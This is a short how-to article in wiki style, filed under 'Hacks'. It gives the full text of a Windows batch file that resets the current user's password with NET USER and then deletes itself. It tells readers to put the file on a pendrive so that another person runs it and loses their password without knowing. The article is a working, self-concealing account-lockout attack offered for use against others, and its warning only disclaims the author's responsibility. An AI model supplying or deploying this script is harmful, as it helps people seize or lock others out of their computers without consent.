Edit Article

Edited by Ankit Dubey, Shina, Laura

Change one's user password by simple batch program....

EditSteps

  1. Change Admin Password by Batch Programming Step 1.jpg
    1
    Batch programming is very useful in such a task ....write the following code in notepad and save it as any name of your choice but remember that extension should be (.bat) eg. (pwd.bat)
  2. Change Admin Password by Batch Programming Step 2.jpg
    2
    Open your notepad and write this code-------->
    • @echo off
    • NET USER %username% ankit
    • DEL pwd.bat
  3. Change Admin Password by Batch Programming Step 3.jpg
    3
    Now save it as pwd.bat
  4. Change Admin Password by Batch Programming Step 4.jpg
    4
    Your file is ready and you can copy it in one's pendrive and as soon as he execute it, the password will change


Add your own method
Save

EditWarnings

  • The author is not responsible for any damage in your computer. Do it at your own risk

Article Info

Categories: Hacks

Recent edits by: Shina, Ankit Dubey

Thanks to all authors for creating a page that has been read 870 times.

Was this article accurate?

YesNo